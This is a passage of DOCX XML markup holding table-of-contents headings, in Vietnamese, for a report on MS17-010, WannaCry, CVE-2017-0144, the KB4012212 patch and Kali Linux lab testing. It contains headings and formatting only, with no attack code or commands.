          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> MS17-010 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mã</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>độc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>WannaCry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2744B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.2.1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bối</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cảnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tác</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>động</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ninh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ···························· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC421D5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.2.2. Danh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mục</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin MS17-010 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phạm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đề</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tài</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ······· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52D840" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.2.3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cơ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sinh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> FEA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2017-0144</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·········· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EC9FF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.2.4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>vá</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chính</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thức</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> KB4012212 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cơ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>khắc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phục</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D7FEB2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.3. Công </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kiểm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dò</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quét</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ································ </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4352E24F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    1.3.1. Kali Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>môi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kiểm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ························ </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
